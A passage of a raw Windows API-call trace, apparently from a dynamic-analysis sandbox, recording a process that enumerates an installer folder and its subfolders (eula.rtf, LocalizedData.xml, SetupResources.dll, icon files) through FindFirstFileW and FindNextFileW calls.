ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260508 [0045.872] FindNextFileW (in: hFindFile=0x4260508, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.872] FindNextFileW (in: hFindFile=0x4260508, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.872] FindNextFileW (in: hFindFile=0x4260508, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1397e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.872] FindNextFileW (in: hFindFile=0x4260508, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.872] FindNextFileW (in: hFindFile=0x4260508, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.872] FindClose (in: hFindFile=0x4260508 | out: hFindFile=0x4260508) returned 1 [0045.872] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.872] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="3076", cAlternateFileName="")) returned 1 [0045.873] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.873] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3076\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260408 [0045.873] FindNextFileW (in: hFindFile=0x4260408, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.873] FindNextFileW (in: hFindFile=0x4260408, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.873] FindNextFileW (in: hFindFile=0x4260408, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.873] FindNextFileW (in: hFindFile=0x4260408, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.873] FindNextFileW (in: hFindFile=0x4260408, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.873] FindClose (in: hFindFile=0x4260408 | out: hFindFile=0x4260408) returned 1 [0045.873] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.873] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="3082", cAlternateFileName="")) returned 1 [0045.874] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.874] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3082\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42606c8 [0045.882] FindNextFileW (in: hFindFile=0x42606c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.882] FindNextFileW (in: hFindFile=0x42606c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbfd, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.882] FindNextFileW (in: hFindFile=0x42606c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1387c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.882] FindNextFileW (in: hFindFile=0x42606c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.882] FindNextFileW (in: hFindFile=0x42606c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.882] FindClose (in: hFindFile=0x42606c8 | out: hFindFile=0x42606c8) returned 1 [0045.882] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.882] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Client", cAlternateFileName="")) returned 1 [0045.882] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.882] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Client\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260688 [0045.882] FindNextFileW (in: hFindFile=0x4260688, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.882] FindNextFileW (in: hFindFile=0x4260688, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce2bc00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0xce2bc00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0xce2bc00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x31444, dwReserved0=0x0, dwReserved1=0x0, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0045.883] FindNextFileW (in: hFindFile=0x4260688, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0045.883] FindNextFileW (in: hFindFile=0x4260688, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 0 [0045.883] FindClose (in: hFindFile=0x4260688 | out: hFindFile=0x4260688) returned 1 [0045.883] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.883] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbc518d00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbc518d00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbc518d00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3ef6, dwReserved0=0x0, dwReserved1=0x240000, cFileName="DHtmlHeader.html", cAlternateFileName="DHTMLH~1.HTM")) returned 1 [0045.883] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x159d5, dwReserved0=0x0, dwReserved1=0x240000, cFileName="DisplayIcon.ico", cAlternateFileName="DISPLA~1.ICO")) returned 1 [0045.883] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Extended", cAlternateFileName="")) returned 1 [0045.883] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.883] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Extended\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260608 [0045.883] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.883] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2a714f00, ftCreationTime.dwHighDateTime=0x1cac6f0, ftLastAccessTime.dwLowDateTime=0x2a714f00, ftLastAccessTime.dwHighDateTime=0x1cac6f0, ftLastWriteTime.dwLowDateTime=0x2a714f00, ftLastWriteTime.dwHighDateTime=0x1cac6f0, nFileSizeHigh=0x0, nFileSizeLow=0x16c82, dwReserved0=0x0, dwReserved1=0x0, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0045.884] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0045.884] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 0 [0045.884] FindClose (in: hFindFile=0x4260608 | out: hFindFile=0x4260608) returned 1 [0045.884] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.884] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Graphics", cAlternateFileName="")) returned 1 [0045.884] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.884] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260388 [0045.896] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.896] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Print.ico", cAlternateFileName="")) returned 1 [0045.896] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate1.ico", cAlternateFileName="")) returned 1 [0045.896] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate2.ico", cAlternateFileName="")) returned 1 [0045.897] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate3.ico", cAlternateFileName="")) returned 1 [0045.897] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate4.ico", cAlternateFileName="")) returned 1 [0045.897] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate5.ico", cAlternateFileName="")) returned 1 [0045.897] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate6.ico", cAlternateFileName="")) returned 1 [0045.897] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, 